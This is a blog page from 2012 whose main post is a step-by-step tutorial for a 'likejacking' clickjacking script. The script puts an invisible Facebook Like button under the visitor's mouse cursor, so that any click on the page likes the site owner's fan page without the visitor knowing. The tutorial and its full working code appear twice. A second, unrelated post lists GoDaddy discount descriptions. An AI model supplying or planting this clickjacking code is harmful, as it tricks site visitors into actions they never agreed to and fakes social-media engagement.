Automatically Increase Facebook Fans in Fan-page with Webpage Script

Friday, September 14, 2012 | comments (37)



Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }
 
</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :)

Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }
 
</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :) 

Godaddy Coupon code/Promo Code List Aug 30 2012

Saturday, September 1, 2012 | comments

Godaddy promo code list for August 30 2012 Friday checked and verified manually*, about 25 Godaddy promo codes listed.
................................
1-click the code (automatically copies to your clipboard)
2-just Ctrl+V (paste) to code field in Go daddy.
Popular Codes:
....................
$5.99 .COMS!* 

.........
$7.99 .Net registrations, transfers and renewals.--New--

.......................
Register .Com domains for 7.99$ 

.................
8.49$ .Com RENEWALS--Save more then 40% --

Best for .com renewals
.....................
Save 20% on ALL hosting plans

.................................................
Web Hosting from just $1.99 per month for 3 months! 

...............
Save more than 50% on Ssl certificates /12.99$ ssl certification

...............................................................
General Godaddy Codes--You can save for ANY product on your order with this codes.
..............
Save $1 on your order

..........................
Save 10% off your order -No minumum-Works for Renewals also-

...................
Save 5$ off your order 30$ or more-May work for Renewals also-

.........
Save 5$ off your order 30$ or more

..............
Save 15% off your order 40$ or more

...........
Save 10$ off your order 50$ or more-may work for renewals also-

...................
Save 10$ off your order 50$ or more

.........
Save 15% off your order 75$ or more--For renewals also-

................
SAve 15% off your order $50 or more

..............
Save 32% off your order

.................
Godaddy Domain Promo Codes
............
Register a new .COM* and get a .INFO for FREE! Add both names to your cart before checking out. 

.............
$9.99* on .CO domain registration

............
Get .org domains for 5.99$

.................
8.49$ .Com RENEWALS--Save more then 35% --

Best for .com renewals
...................
7.99$ .Com domain registration (not for Renewals)

............
All American deal , .Us domains for $3.99

....................
Renew your .Mobi domains for 10.99$-save over 40% and .Tv domains

The is the best code for .mobi renewals.means over 40% savings.
...........................
Godaddy Hosting Promo Codes
.......................
Save 20% on ALL hosting plans

.................................................
Web Hosting from just $1.99 per month for 3 months! 

.............
Don't forget your FREE hosting upgrade*! Get Deluxe 4GH Hosting for the price of Economy

............
Save 20% off new hosting plans

....................
The power of the Cloud for 25% off with Virtual DataCenter from GoDaddy.com

................
OTHER PRODUCTS
...........
FREE domain with 12+ month Website Builder purchase!

......
Save 20% off premium ssl certificates!

.....................
Godaddy Auction Discount-save more then 40%

....................
Save an EXTRA 20%* on Premium Search Engine Visibility plans! 

.................
You can with Quick Shopping Cart®! Get it for 50%* off

............
Beat the Increase. Renew Your Hosting Now. 

Act now and lock in your existing low rate for up to 5 years. 
Have no i,dea how much savings this promo code gives.
..........
We begin 1$ Godaddy Promo Code newsletter , you can submit your e-mail by right sidebar.

*date is based on Gmt+3 , we dont have chance to confirm all codes manually.
 
Support : Sanjaya Einy | Blogger Tricks Templatee
Copyright © 2011. Tips and Tricks NET - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Premium Blogger Template